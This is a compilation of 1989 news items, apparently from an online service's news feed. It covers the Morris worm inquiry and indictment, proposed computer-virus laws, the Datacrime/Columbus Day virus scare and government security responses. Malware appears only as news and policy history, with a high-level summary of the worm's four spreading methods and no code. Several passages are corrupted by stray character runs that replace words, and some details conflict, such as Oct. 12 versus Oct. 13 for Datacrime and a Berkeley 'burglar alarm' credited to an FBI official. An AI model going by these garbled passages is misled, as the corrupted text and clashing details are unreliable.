AP says Morris, who is on a leave of absence from Cornell's doctoral program, +declined to be interviewed by the investigating commission. + Speculating on why Morris cre{fd the rogue program, the panel wrote, "It may +simply have been the unfocused intellectual meanderings of a hacker completely +absorbed with his creation and unharnessed by considerations of explicit purpose +or potential effect." 
+ Incidentally, the panel also pointed out what others in the industry observed +last November, that the program technically was not a "virus," which inserts +itself into a host program to reproduce, but actually was a "worm," an +independent program that endlessly duplicates itself once placed in a computer +system. + As reported, Morris still is being investigated by a federal grand jury in +Syracuse, N.Y., and by the US Justice Department in Washington, D.C. + AP says the university commission rejected the idea that Morris created the +worm to point out the need for greater computer security. Says the report, "This +was an accidental byproduct of the event and the resulting display of media +interest. Society does not condone burglary on the grounds that it heightens +concern about safety and security." + The report said, "It is no act of genius or heroism to exploit such +weaknesses," adding that Morris, a first-year student, should have reported the +flaws he discovered, which would "have been the most responsible course of +action, and one that was supported by his colleagues." + The group also believes the program could have been created by many students, +graduate or undergraduate, particularly if they were aware of the Cornell +system's well-known security flaws. + The wire service quotes thgeport`.ձѥjɥBpKwanted to +spread the worm without detection, but did not want to clog the computers. In +that regard, the commission said Morris clearly should have known the worm would +replicate uncontrollably and thus had a "reckless disregard" for the +consequences. + However, the Cornell panel also disputed some industry claims that the Morris +program caused about $96 million in damage, "especially considering no work or +data were irretrievably lost." It said the greatest impact may be a loss of +trust among scholars who use the research network. 
+ AP says the report found that computer science professionals seem to favor +"strong disciplinary measures," but the commission said punishment "should not +be so stern as to damage permanently the perpetrator's career." + --Charles Bowen + + +ETHICS STUDY NEEDED IN COMPUTING + + (April 4) + A Cornell University panel says education is more effective than security in +preventing students from planting rogue programs in research networks. + As reported earlier, the panel investigated the work of Cornell graduate +student Robert Morris Jr., concluding the 23-year-old Maryland man acted alone +and never intended permanent damage when he inserted a "worm" into a nationwide +research network last November. + Speaking at a press conference late yesterday in Ithaca, N.Y., Cornell Provost +Robert Barker said, "One of the important aspects of making the report public is +that we can now use it on campus in a much fuller way than we have before." + United Press International says Cornell has taken steps to improve its +computer security since the incident, but members of the committee noted that +money spent on building "higher fences" was money that could not be spent on +education. + Barker said Cornell will place a greater emphasis on educating its students on +computer ethics, and might use the recent case as an example, instead of relying +primarily on increased security to prevent similar incidents. Said the provost, +"It was the security of the national systems, and not of Cornell, that was the +problem here." + As reported, Morris's worm infected up to 6,000 Unix-based computers across +the country. A federal grand jury in Syracuse, N.Y., investigated the case and +Justice Department officials in Washington now are debating whether to prosecute +Morris. + --Charles Bowen + + + +ILLINOIS STUDIES VIRUS LAW + + (April 15) + The virus panic in some state legislatures continues as anti- virus +legislation is introduced in Illinois. 
+ Illinois House Bill 498 has been drafted by Rep. Ellis B. Levin (D-Chicago) to +provide criminal penalties for loosing a so-called computer virus upon the +public. The bill is similar to one that has been introduced in Congress. + Rep. Levin's bill provides that a person commits "'computer tampering by +program' when he knowingly: inserts into a computer program information or +commands which, when the program is run, causes or is designed to cause the +loss, damage or disruption of a computer or its data, programs or property to +another person; or provides or offers such a program to another person." + Conviction under the legislation would result in a felony. A second +conviction would bring harsher penalties. + Currently, the bill is awaiting a hearing in the Illinois' House Judiciary II +Committee. It is expected that testimony on HB 498 will be scheduled sometime +during April. + --James Moran + + +ERRORS, NOT CRACKERS, MAIN THREAT + + (April 28) + A panel of computer security experts has concluded that careless users pose a +greater threat than malicious saboteurs to corporate and government computer +networks. + Citing the well-publicized allegations that Cornell University graduate +student Robert T. Morris Jr. created a worm program last November that swept +through some 6,000 networked systems, Robert H. Courtney Jr. commented, "It was +a network that no one attempted to secure." + According to business writer Heather Clancy of United Press International, +Courtney, president of Robert Courtney Inc. computer security firm, said the +openness of Internet was the primary reason it was popular among computer +crackers, some of whom are less talented or more careless than others. + "People making mistakes are going to remain our single biggest security +problems," he said. "Crooks can never, ever catch up." + Sharing the panel discussion in New York, Dennis D. 
Steinauer, a computer +scientist with the National Institute for Standards and Technologies, added that +network users should not rely only on technological solutions for security +breaks. + "Not everyone needs all security products and mechanisms out there," he said. +"The market is not as large as it is for networking equipment in general." He +added that a standard set of program guidelines, applicable to all types of +networks, should be created to prevent mishaps. "There has been a tremendous +amount of work in computer (operating) standards. The same thing is now +happening in security." + Fellow panelist Leslie Forman, AT&T's division manager for the data systems +group, said companies can insure against possible security problems by training +employees how to use computers properly and tracking users to make sure they +aren't making potentially destructive errors. "It's not a single home run that +is going to produce security in a network," she said. "It's a lot of little +bunts." + --Charles Bowen + + +EXPERTS TESTIFY ON COMPUTER CRIME + + (May 16) + Electronic "burglar alarms" are needed to protect US military and civilian +qomputer systems, Clifford Stoll, an astronomer at the Harvard- Smithsonian +Center for Astrophysics, told a Senate Judiciary subcommittee hearing on +computer crimes, reports United Press International. + Stoll was the alert scientist who detected a 75-cent accounting error in +August 1986 in a computer program at Lawrence Berkeley Laboratory that led him +to discover a nationwide computer system had been electronically invaded by West +Germans. + "This was a thief stealing information from our country," he said. "It deeply +bothers me that there are reprobates who say, `I will steal anything I can and +sell it to whoever I want to.' It opened my eyes." + Following his discovery, Stoll was so immersed in monitoring the illegal +activity that he was unable to do any astronomy work for a year. 
+ "People kind of look at this as a prank," Stoll said. "It's kind of funny on +the one hand. But it's people's work that's getting wiped out." + The West German computer criminals, who were later determined to have been +working for Soviet intelligence, searched the US computer network for +information on the Strategic Defense Initiative, the North American Defense +Command and the US KH-11 spy satellite. They also withdrew information from +military computers in Alabama and California, although no classified information +was on any of the computer systems. + William Sessions, FBI director, also appeared before the Senate subcommittee +and said the bureau is setting up a team to concentrate on the problem. + He explained that computer crimes are among "the most elusive to investigate" +since they are often "invisible." The FBI has trained more than 500 agents in +this area. + UPI notes that Sessions agreed to submit his recommendations to Sen. Patrick +Leahy (D-Vt.), the subcommittee chairman, for new laws that could be used to +protect sensitive computer networks from viruses. Currently, there are no +federal laws barring computer viruses. + The FBI is working with other federal agencies to assess the threat of such +crimes to business and national security. + William Bayes, assistant FBI director, told the senators he likens a computes +to a house with locks on the door. He explained that he has placed a burglar +alarm on his computer at Berkeley, programming it to phone him when someone +tries to enter it. He said more computer burglar alarms may be needed. + -- Cathryn Conroy + + +MASS. CONSIDERS NEW INTRUSION LAW + + (May 21) + In Boston, a state senator has offered a bill that would make it a violation +of Massachusetts law to enter a computer without authorization. It also would +level penalties against those caught planting so-called computer "viruses." + Sen. 
William Keating, the bill's sponsor, told The Associated Press his +measure considers this new category of crime to be analogous to breaking into a +building. + "It's an attempt," Keating added, "to put on the statutes a law that would +penalize people for destruction or deliberate modification or interference with +computer properties. It clarifies the criminal nature of the wrongdoing and, I +think, in that sense serves as a deterrent and makes clear that this kind of +behavior is criminal activity." + The senator credits a constituent, Elissa Royal, with the idea for the bill. +Royal, whose background is in hospital administration, told AP, "I heard about +(computer) viruses on the news. My first thought was the clinical pathology +program. Our doctors would look at it and make all these decisions without +looking at the hard copy. I thought, what if some malevolent, bright little +hacker got into the system and changed the information? How many people would be +injured or die?" + Keating's bill would increase penalties depending on whether the attacker +merely entered a computer, interfered with its operations or destroyed data. In +the most serious case, a person found guilty of knowingly releasing a virus +would be subject to a maximum of 10 years in prison or a $25,000 fine. + AP says the bill is pending in committee, as staff members are refining its +language to carefully define the term "virus." + --Charles Bowen + + +COMPUTER VACCINE MARKET THRIVES ON USER FEAR + + (May 23) + The computer protection market is thriving. The reason? Fear. Fear of the +spread of computer viruses and worms has caused a boom in products that are +designed to protect unwitting users from the hazards of high- tech diseases. + According to the Dallas Morning News, there is a surging cottage industry +devoted to creating "flu shots" and "vaccines" in the form of software and +hardware; however, many of these cures are nothing more than placebos. 
+ "There's a protection racket springing up," said Laura A. DiDio, senior editor +of Network World, the trade publication that sponsored a recent executive +roundtable conference in Dallas on "Network Terrorism." + Last year alone, American businesses lost a whopping $555.5 million, 930 years +of human endeavor and 15 years of computer time from unauthorized access to +computers, according to statistics released by the National Center for computer +Crime Data in Los Angeles, Calif. + The most difficult systems to protect against viruses are computer networks +since they distribute computing power throughout an organization. Despite the +threat, sales are thriving. Market Intelligence Research says sales of sonalM +comutѶ5ݽqequipment grew 50 percent last year and are expected to +grow another 41 percent this year to $929.5 million. + Meanwhile, the Computer Virus Industry Association says that the number of +computer devices infected by viruses in a given month grew last year from about +1,000 in January to nearly 20,000 in November and remained above 15,000 in +December. + -- Cathryn Conroy + + + +MORRIS SUSPENDED FROM CORNELL + + (May 25) + Robert T. Morris, the 23-year-old graduate student whose "worm" program +brought down some 6,000 networked government and scientific computers last +November, has been suspended from Cornell University. + The New York Times reported today Cornell officials have ruled that Morris, a +first-year graduate student, violated the school's Code of Academic Integrity. + The paper quoted a May 16 letter to Morris in which Alison P. Casarett, dean +of Cornell's graduate school, said the young man will be suspended until the +beginning of the 1990 fall semester. Casarett added that if Morris wants to +reapply, the decision to readmit him will be made by the graduate school's +computer science faculty. 
+ The Times says the letter further states the decision to suspend Morris was an +academic ruling and was not related to any criminal charges Morris might face. + No criminal charges have been levied against Morris so far. A federal grand +jury earlier forwarded its recommendations to the US Justice Department, but no +action has been taken. + As reported last month, a Cornell University commission has said Morris' +action in creating and accidentally releasing the worm program into the ARPANET +system of Unix-based computers at universities, private corporations and +military installations was "a juvenile act that ignored the clear potential +consequences." + While the Morris worm did not destroy data, it forced the shut- down of many +of the systems for up to two days while they were cleared of the rogue program. + --Charles Bowen + + +PENDING COMPUTER LAWS CRITICIZED + + (June 18) + Computer attorney Jonathan Wallace says that the virus hystYZXѥhasn't +quieted down and that legislation that will be reintroduced in Congress this +year is vague and poorly drafted. + Noting that at least one state, New York, is also considering similar +legislation, Wallace says that legislators may have overlooked existing laws +that apply to "software weapons." In a newsletter sent out to clients, Wallace +notes p(Xѡthe Electronic Communications Privacy Act (ECPA) and the +Computer Fraud and Abuse Act (CFAA) cover the vast majority of software crimes. + Wallace points out that both the ECPA and the CFAA already impose criminal +penalties on illegal actions. Even the Senate Judiciary Committee has refutted +the idea that more federal laws are needed. "Why don't we give existing laws a +chance to work, before rushing off to create new ones," Wallace asks. + Wallace is the editor of Computer Li!Letter and is an Assistant System +Administrator on CompuServe's Legal Forum (GO LAWSIG). 
+ --James Moran + + +NEW VIRUS HITS THAI COMPUTERS + + (June 27) + A newspaper in Bangkok is reporting that a new computer virus, said to be the +most destructive yet discovered, has struck computer systems in Thailand. + According to the Newsbytes News Service, computer security specialist John +Dehaven has told The Bangkok Post, "This is a very subtle virus that can lay +dormant, literally, for years." + The wire service says that two Thai banks and several faculties at +Chulalongkorn University were hit by the rogue program -- called the "Israeli +virus," because it was first detected there -- at the beginning of last month. +Newsbytes says the infection spreads quickly through any computer once it is +activated. + --Charles Bowen + + + +CONGRESS STUDIES COMPUTER VIRUSES + + (July 21) + The Congress is taking a hard look at a new report that says major computer +networks remain vulnerable to computer viruses that are capable of crippling +communications and stopping the nation's telecommunications infrastructure dead +in its tracks. + Rep. Edward Markey (D-Mass.), chairman of the House telecommunications +subcommittee, told a hearing earlier this week that federal legislation may be +needed to ease the threats posed by computer viruses. + "The risk and fear of computer-based sabotage must be reduced to an acceptable +level before we can reasonably expect our national networks to accomplish the +purposes for which they were created," Markey said during a hearing Wednesday on +the new congressional study. + "We must develop policies that ensure (network's) secure operation and the +individuals' rights to privacy as computer network technologies and applications +proliferate," he added. + The report by the General Accounting Office examined last year's virus attack +that shut down the massive Internet system, which links 60,000 university, +government and industry research computers. 
+ The GAO found that Internet and other similar systems remain open to attack +with much more serious results than the temporary shutdown experienced by +Internet. + The GAO warned that the Internet virus, a "worm" which recopied itself until +it exhausted all of the systems available memory, was relatively mild compared +to other more destructive viruses. + "A few changes to the virus program could have resulted in widespread damage +and compromise," the GAO report said. + "With a slightly enhanced program, the virus could have erased files on +infected computers or remained undetected for weeks, surreptitiously changing +information on computer files," the report continued. + The GAO recommended the president's science advisor and the Office of Science +and Technology Policy should take the lead in developing new security for +Internet. + In addition, the report said Congress should consider changes to the Computer +Fraud and Abuse Act of 1986, or the Wire Fraud Act, to make it easier to bring +charges against computer saboteurs. + Joining in sounding the alarm at the hearing was John Landry, executive vice +president of Cullinet Software of Westwood, Mass., who spoke on behalf of +ADAPSO. + "The range of threats posed by viruses, worms and their kin is limited only by +the destructive imagination of their authors," Landry said. "Existing computer +security systems often provide only minimal protection agaifu a determined +attack." + Landry agreed the Internet attack could have been much worse. He said viruses +have been found that can modify data and corrupt information in computers by +means as simple as moving decimal points one place to the left or right. + One recently discovered virus, he said, can increase disk access speed, +resulting in the wearing out of disk drives. They also have been linked to +"embezzlement, fraud, industrial espionage and, more recently, international +political espionage," he said. 
+ "Virus attacks can be life threatening," Landry said, citing a recent attack +on a computer used to control a medical experiment. "The risk of loss of life +resulting from infections of airline traffic control or nuclear plant monitoring +systems is easily imaginable," he said. + Landry said ADAPSO endorses the congressional drive toward tightening existing +law to ensure that computer viruses are covered along with other computer +abuses. + --J. Scott Orr + + + +GLOSSARY OF VIRUS-RELATED TERMS + + (July 21) + Until last year's computer virus attack on the massive Internet network made +headlines, computer sabotage attracted little attention outside computer and +telecommunications circles. + Today "computer virus" has become a blanket term covering a wide range of +software threats. + ADAPSO, the computer software and services industry association, believes the +term has been thrown around a little too loosely. Here, then, is ADAPSO's +computer virus glossary: + -:- COMPUTER VIRUS, a computer program that attaches itself to a legitimate, +executable program, then reproduces itself when the program is run. + -:- TROJAN HORSE, a piece of unauthorized code hidden within a legitimate +program that, like a virus, may execute immediately or be linked to a certain +time or event. A trojan horse, however, does not self-replicate. + -:- WORM, an infection that enters a computer system, typically through a +security loophole, and searches for idle computer memory. As in the Internet +case, the worm recopies itself to use up available memory. + -:- TRAPDOOR, a program written to provide future access to computer systems. +These are typical entryways for worms. + -:- TIME BOMB, a set of computer instructions entered into a system or piece +of software that are designed to go off at a predetermined time. April Fool's +Day and Friday the 13th have been popular times for time bomb's to go off. 
+ -:- LOGIC BOMB, similar to a time bomb, but linked instead to a certain event, +such as the execution of a particular sequence of commands. + -:- CHAOS CLUB, a West German orc!ization that some have alleged was fnmed +to wreak havoc on computer systems through the use of viruses and their kin. + --J. Scott Orr + + + +MORRIS INDICTED IN WORM INCIDENT + + (July 27) + A federal grand jury has indicted the 24-year-old Cornell University graduate +student who is alleged to have released a "worm" program that temporarily +crippled the massive Internet computer network last November. + Robert Tappan Morris of Arnold, Md., becomes the first person to be indicted +under the federal Computer Fraud and Abuse Act of 1986 in connection with the +spread of a computer virus. + In convicted, Morris faces a maximum sentence of five years in federal prison +and a $250,000 fine. Morris' attorney, Thomas A. Guidoboni, said his client will +fight the charges. + The virus, a worm that sought out unused memory throughout the system and +recopied itself to fill the vacant space, infected at least 6,000 computers +nationwide. Internet is an unclassified, multinetwork system connecting 500 +networks and more than 60,000 computers around the world. + The indictment, handed up yesterday in Syracuse, N.Y., charges Morris +"intentionally and without authorization, accessed ... federal interest +computers." + The action, the indictment continued, "prevented the authorized use of one or +more of these federal interest computers and thereby caused a loss to one or +more others of a value aggregating $1,000 or more." + The indictment said the illegally accessed computers included those at the +University of California at Berkeley, the Massachusetts Institute of Technology, +the National Aeronautics and Space Administration, Purdue University and the US +Air Force Base Logistics Command at Wright Paterson Air Force Base in Dayton, +Ohio. + "Mr. 
Morris will enter a plea of not guilty and contest the charge against +him," Guidoboni said. He said his client "looks forward to his eventual +vindication and his return to a normal life." + Morris, a Harvard graduate and computer science graduate student at Cornell, +is about to begin a one-year suspension from Cornell that stemmed from the +incident. His father is chief computer scientist for the National Computer +Security Center near Baltimore. + The indictment comes less than a week after the General Accounting Office +found that Internet and other similar systems remain open to attack with much +more serious results than the temporary shutdown experienced last year. + The GAO warned the Internet virus was relatively mild compared to other more +destructive viruses. It went on to recommend the President's Science Advisor and +the Office of Science and Technology Policy take the lead in developing new +security for Internet. + In addition, the report said Congress should consider changes to the Computer +Fraud and Abuse Act, or the Wire Fraud Act, to make it easier to bring charges +against computer saboteurs. + The GAO said the Internet worm spread largely by exploiting security holes in +system software based on the Berkeley Software Distribution Unix system, the +most commonly used operating system on Internet. + The report from the GAO said the virus moved with startling speed. It was +first detected at 9 p.m. on Nov. 2. Within an hour it had spread to multiple +sites and by the next morning had infected thousands of systems. + According to GAO, the virus had four methods of attack. It used: + -:- A debugging feature of the "Sendmail" utility program to allow the sending +of an executable program. After issuing a debug command, the virus gave orders +to copy itself. + -:- A hole in another utility program -- "Fingerd," which allows users to +obtain public information about other users -- to move on to distant computers. 
+ -:- Different methods to guess at user passwords. Once successful, the virus +"masqueraded" as a legitimate user to spread and access other computers. + -:- "Trusted host" features to spread quickly though local networks once one +computer was penetrated. + --J. Scott Orr + + + + +RESEARCHER UNCOVERS OCT. 12 VIRUS + + (July 31) + An official with a British firm that markets anti-virus software says the +company has uncovered a new virus called "Datacrime" is set to attack MS-DOS +systems starting Ot< 12. + Dr. Jan Hruska of Sophos UK tells Computergram International the virus +apparently appends itself to .COM (command) files on MS-DOS systems. + "Operating on a trigger mechanism," CI says, "the virus reformats track 0 of +the hard disk on or after Oct. 12. It has no year check and so will remain +active from Oct. 12 onwards destroying or losing programs and data." + Hruska told the publication this is a relatively new virus and that its +encrypted form reveals its name ("Datacrime") and its date of release, last +March 1. + Sophos markets a program called Vaccine version 4 designed to detect known +viruses. + --Charles Bowen + + + +MORRIS TO PLEAD INNOCENT + + (Aug. 2) + Robert T. Morris Jr., the former Cornell University graduate student who was +indicted last week by a federal grand jury, will plead innocent in federal court +to charges he planted a computer worm that wrecked havoc with some 6,000 +computers nationwide, reports United Press International. + As reported, the 24-year-old Arnold, Md., resident was indicted by the grand +jury on charges of breaking a federal statute by gaining unauthorized access to +a nationwide computer network and causing damage in excess of $1,000. + Both federal investigators and a Cornell University panel claim Morris created +the computer worm, which spread from the Cornell campus in Ithaca, N.Y., on Nov. +2 to computers around the country, notes UPI. 
+ The worm infiltrated a Department of Defense computer system and forced many +federal and university computers to shut down. The exact amount of damage has +not been determined. + If convicted, Morris could be sent to prison for five years and fined up to +$250,000. In addition, the judge could order him to make restitution to those +who were adversely affected by the incident. + -- Cathryn Conroy + + + +NIST FORMS COMPUTER SECURITY NETWORK + + (Aug. 3) + The National Institute of Standards and Technology is working with other +federal agencies to establish a government-wide information network on security +incidents and issues, reports Government Computer News. + Organized by NIST's Computer Security Division, the network would supply the +latest information to agencies on security threats, develop a program to report +and assess security incidents as well as offer assistance. + Dennis Steinauer, evaluation group manager of the Computer Security Division, +said the plan is a response to the communications problems federal agencies +suffered during last November's worm attack on Internet b9 Jornell University +graduate student Robert T. Morris Jr. + In addition to NIST, the departments of Energy, Justice and Transportation as +well as the National Science Foundation and NASA are participating in the +project, which calls for each agency to organize a security incident response +and resource center. + NIST's network would connect the centers electronically, allowing them to +communicate with one another. Steinauer said he wants to set up a master +database of contacts, phone numbers and fax numbers to ensure communications. + One aspect of the plan calls for each center to become expert in some specific +area of the technology, such as personal computers, local area networks or +multiuser hosts. + "The answer is not some monolithic, centralized command center for +government," Steinauer told GCN. 
"Problems occur in specific user or technology +communities, and we see the solutions evolving where the reaction is by people +who know the user community and the environment." + He explained that the Computer Security Act has helped increase security +awareness within the government, but the emergence of computer viruses, worms +and other sophisticated threats has demonstrated the need for more advanced +security tools. + -- Cathryn Conroy + + +AUSTRALIAN CHARGED WITH CRACKING + + (Aug. 14) + Australia is reporting its first computer cracking arrest. A Melbourne student +is charged with computer trespass and attempted criminal damage. + Authorities allege 32-year-old Deon Barylak was seen loading a personal +computer with a disk that was later found to possess a computer virus. + "Fortunately, it was stopped before it could spread, which is why the charge +was only attempted criminal damage," senior detective Maurice Lynn told Gavin +Atkins for a report in Newsbytes News Service. + The wire service said Barylak could face a maximum of 100 years' jail and a +fine. + Also police expect to make further arrests in connection with the case. +Authorities said Barylak also faces charges of possessing computer equipment +allegedly stolen from a community center. + --Charles Bowen + + +INTERNET VIRUS BACK? + + (Sept. 4) + Apparently, neither the threat of criminal sanctions nor the hazards of +investigation by the FBI is enough to keep the Internet computer communications +network secure from intrusion. The Department of Defense agency responsible for +monitoring Internet security has issued a warning that unauthorized system +activity recently has been detected at a number of sites. + The Computer Emergency Response Team (CERT) says that the activity has been +evident for some months and that security on some networked computers may have +been compromised. In a warning broadcast to the Internet, CERT says that the +problem is spreading. 
+ Internet first came to general attention when a came to much of the computing +communities attention when a 23-year-old Cornell University student was said to +be responsible for inserting a software "worm" into the network. The Department +of Defense's Advanced Project Agency network (ARPANET) also was infected and +CERT was formed to safeguard networks used or accessed by DoD emplyees and +contractors. + In its warning about recent intrusions, CERT says that several computers have +had their network communications programs replaced with hacked versions that +surreptitiously capture passwords used on remote systems. + "It appears that access has been gained to many of the machines which have +appeared in some of these session logs," says a broadcast CERT warning. "As a +first step, frequent telnet [communications program] users should change their +passwords immediately. While there is no cause for panic, there are a number of +things that system administrators can do to detect whether the security on their +machines has been compromised using this approach and to tighten security on +their systems where necessary." + CERT went on to suggest a number of steps that could be taken to verify the +authenticity of existing programs on any individual UNIX computer. Among those +was a suggestion to reload programs from original installation media. + --James Moran + + +AIR FORCE WARNS ITS BASES OF POSSIBLE "COLUMBUS DAY VIRUS" + + (Sept. 10) + The US Air Force has warned its bases across the country about a possible +computer virus reportedly set to strike MS-DOS systems Oct. 12. + Warning of the so-called "Columbus Day virus" was issued by the Air Force +Communications Command at Scott Air Force Base, Ill., at the request of the +Office of Special Investigations. + OSI spokesman Sgt. Mike Grinnell in Washington, D.C., told David Tortorano of +United Press International the advisory was issued so computer operators could +guard against the alleged virus. 
"We're warning the military about this," +Grinnell said, "but anybody that uses MS-DOS systems can be affected." + As reported here July 31, Dr. Jan Hruska, an official with a British firm +called Sophos UK, which markets anti-virus software, said his company had +uncovered a new virus called "Datacrime." Hruska told Computergram International +at the time that the virus apparently appends itself to .COM (command) files on +MS-DOS systems. + Said CI, "Operating on a trigger mechanism, the virus reformats track 0 of the +hard disk on or after Oct. 12. It has no year check and so will remain active +from Oct. 12 onwards destroying or losing programs and data." Hruska told the +publication this was a relatively new virus and that its encrypted form revealed +its name ("Datacrime") and its date of release, last March 1. + Meanwhile, Air Force spokeswoman Lynn Helmintoller at Hurlburt Field near Fort +Walton Beach, Fla., told UPI that computer operators there had been directed to +begin making backup copies of files on floppy disks just in case. She said the +warning was received at the base Aug. 28. + Staff Sgt. Carl Shogren, in charge of the small computer technology center at +Hurlburt, told Tortorano no classified data would be affected by the possible +virus attack because the disks used for classified work are different from those +that might be struck. + UPI quoted officials at Scott Air Force Base as saying the warning was sent to +every base with a communications command unit, but that they did not know how +many bases were involved. + --Charles Bowen + + +COMPUTER VIRUSES PLAGUE CONGRESS + + (Sept. 11) + Although Congress recently passed the Computer Security Act to force federal +agencies to guard against high-tech break- ins and computer viruses, the +legislators may soon realize they made a costly mistake. The law applies to all +federal agencies -- except Congress itself. 
And according to Government +Computer News, Capitol Hill has been the victim of several recent virus attacks. + One virus, for instance, emerged about a year ago in the Apple Macintosh +computers of several House offices causing unexplained system crashes. A steep +bill of some $100,000 was incurred before experts were confident the plague, now +known as Scores, was stopped. However, it does still lurk in the depths of the +computers, notes GCN, causing occasional malfunctions. + Dave Gaydos, Congress' computer security manager, says the sources of many +viruses may never be known, since some 10,000 programmers are capable of +producing them. + Capitol Hill legislators and staff members are only now becoming aware of the +potential danger of viruses as more offices are exploring ways to connect with +online database services and with each other through local area networks. + GCN reports that last February, a California congressional office was the +victim of a virus, caught while using a so-called vaccine program meant to +detect intruders into the system. + "I used to laugh about viruses," said Dewayne Basnett, a systems specialist on +Capitol Hill. "But now when you ask me about them, I get very angry. I think +of all the time and effort expended to repair the damage they do." + According to GCN, many of the 3,000 House employees with computers are +ignorant of the risks and unable to take basic precautions. Although various +computer specialists are trying to inform Hill users of computer security issues +and offer training sessions, there is no broad support from the legislators +themselves for such actions. + "We are working to alert people to the dangers," said Gaydos, "but it may take +an incident like a destructive virus to move [Congress] to take precautions." + -- Cathryn Conroy + + + +VIRUS HITS AUSTRALIA + + (Sept. 
12) + Australian authorities are said to be confused about the origin of a supposed +computer virus that has been making the rounds of computer installations in the +South Pacific. An Australian newspaper, The Dominion, says that sensitive data +in Defense Department computers has been destroyed by the virus. + Dubbed the Marijuana virus because of the pro-drug message that is displayed +before any data is erased, it is thought that the misbehaving bug originated in +New Zealand. Some have even suggested that the program was purposely introduced +into Australian Defense computers by agents of New Zealand, a contention that a +Defense Department spokesman branded as "irresponsible." The two South Pacific +nations have had strong disagreements about defense matters, including recent +joint maneuvers in the area by Australian and US forces. + A more likely explanation for the intrusion into Defense computers is the +likelihood that Australian security specialists were examining the virus when +they inadvertently released it into their own security system. The Marijuana +virus is known to have been infecting computers in the country for at least +three months and its only known appearance in government computers occurred in a +Defense sub-department responsible for the investigation and prevention of +computer viruses. + --James Moran + + + +VIRUS THREAT ABSURDLY OVERBLOWN, SAY EXPERTS + + (Sept. 18) + The so-called "Columbus Day Virus" purportedly set to destructively attack +MS-DOS computers on Oct. 13 has computer users -- including the US military -- +scampering to protect their machines. But according to The Washington Post, the +threat is absurdly overblown with less than 10 verified sightings of the virus +in a country with tens of millions of computers. + "At this point, the panic seems to have been more destructive than any virus +itself," said Kenneth R. 
Van Wyk, a security specialist at Carnegie-Mellon +University's Software Engineering Institute, who has been taking some 20 phone +calls daily from callers seeking advice on the subject. + Bill Vance, director of secure systems for IBM Corp., told The Post, "If it +was out there in any number, it would be spreading and be more noticeable." + He predicted Oct. 13 is not likely to be "a major event." + As reported in Online Today, this latest virus goes by several names, +including Datacrime, Friday the 13th and Columbus Day. It lies dormant and +unnoticed in the computer until Oct. 13 and then activates when the user turns +on the machine. Appending itself to .COM (command) files, the virus will +apparently reformats track 0 of the hard disk. + The Post notes that the federal government views viruses as a grave threat to +the nation's information systems and has set in motion special programs to guard +computers against them and to punish those who introduce them. + Centel Federal Systems in Reston, Va., a subsidiary of Centel Corp. of +Chicago, is taking the threat seriously, operating a toll-free hotline staff by +six full-time staff members. More than 1,000 calls have already been received. + Tom Patterson, senior analyst for Centel's security operations, began working +on the virus five weeks ago after receiving a tip from an acquaintance in +Europe. He said he has dissected a version of it and found it can penetrate a +number of software products designed to keep viruses out. + Patterson told The Post that he found the virus on one of the machines of a +Centel client. "The virus is out there. It's real," he said. + Of course, where there's trouble, there's also a way to make money. "The more +panicked people get," said Jude Franklin, general manager of Planning Research +Corp.'s technology division, "the more people who have solutions are going to +make money." + For $25 Centel is selling software that searches for the virus. 
Patterson +said, however, the company is losing money on the product and that the fee only +covers the cost of the disk, shipping and handling. "I'm not trying to hype +this," he said. "I'm working 20-hour days to get the word out." + -- Cathryn Conroy + + + +SICK SOFTWARE INFECTS 100 HOSPITALS NATIONWIDE + + (Sept. 20) + When a hospital bookkeeping computer program could not figure out yesterday's +date, some 100 hospitals around the country were forced to abandon their +computers and turn to pen and paper for major bookkeeping and patient admissions +functions, reports The Washington Post. + Although there was no permanent loss of data or threat to treatment of +patients, the hospital accounting departments found themselves at the mercy of a +software bug that caused major disruptions in the usual methods of doing +business. + The incident affected hospitals using a program provided by Shared Medical +Systems Corp. of Pennsylvania. The firm stores and processes information for +hospitals on its own mainframe computers and provides software that is used on +IBM Corp. equipment. + According to The Post, the program allows hospitals to automate the ordering +and reporting of laboratory tests, but a glitch in the software would not +recognize the date Sept. 19, 1989 and "went into a loop" refusing to function +properly, explained A. Scott Holmes, spokesman for Shared Medical Systems. + The firm dubbed the bug a "birth defect" as opposed to a "virus," since it was +an accidental fault put into the program in its early days that later threatened +the system's health. + At the affected hospitals around the country, patients were admitted with pen +and paper applications. Hospital administrators admitted the process was slower +and caused some delay in admissions, but patient care was never compromised. + -- Cathryn Conroy + + +ARMY TO BEGIN VIRUS RESEARCH + + (Sept. 
21) + Viruses seem to be on the mind of virtually every department administrator in +the federal government, and the US Army is no exception. The Department of the +Army says it will begin funding for basic research to safeguard against the +presence of computer viruses in computerized weapons systems. + The Army says it will fund three primary areas of research: computer security, +virus detection and the development of anti-viral products. Research awards will +be made to US businesses who are eligible to participate in the Small Business +Innovation Research (SBIR) program. + The Army program, scheduled to begin in fiscal year 1990, is at least +partially the result of Congressional pressure. For some months, Congressional +staffers have been soliciting comments about viruses and their potential effect +on the readiness of the US defense computers. + Small businesses who would like to bid on the viral research project may +obtain a copy of Program Solicitation 90.1 from the Defense Technical +Information Center at 800/368-5211. + --James Moran + + + +SO-CALLED "DATACRIME" VIRUS REPORTED ON DANISH POSTGIRO NET + + (Sept. 22) + The so-called "Datacrime" virus, said to be aimed at MS-DOS system next month, +reportedly has turned up on the Danish Postgiro network, a system of 260 +personal computers described as the largest such network in Scandinavia. + Computergram International, the British newsletter that first reported the +existence of the Datacrime virus back in July, says, ""Twenty specialists are +now having to check 200,000 floppy disks to make sure that they are free from +the virus." + Datacrime is said to attach itself to the MS-DOS .COM files and reformats +track zero of the hard disk, effectively erasing it. However, as reported, some +experts are saying the threat of the virus is absurdly overblown, that there +have been fewer than 10 verified sightings of the virus in a country with tens +of millions of computers. 
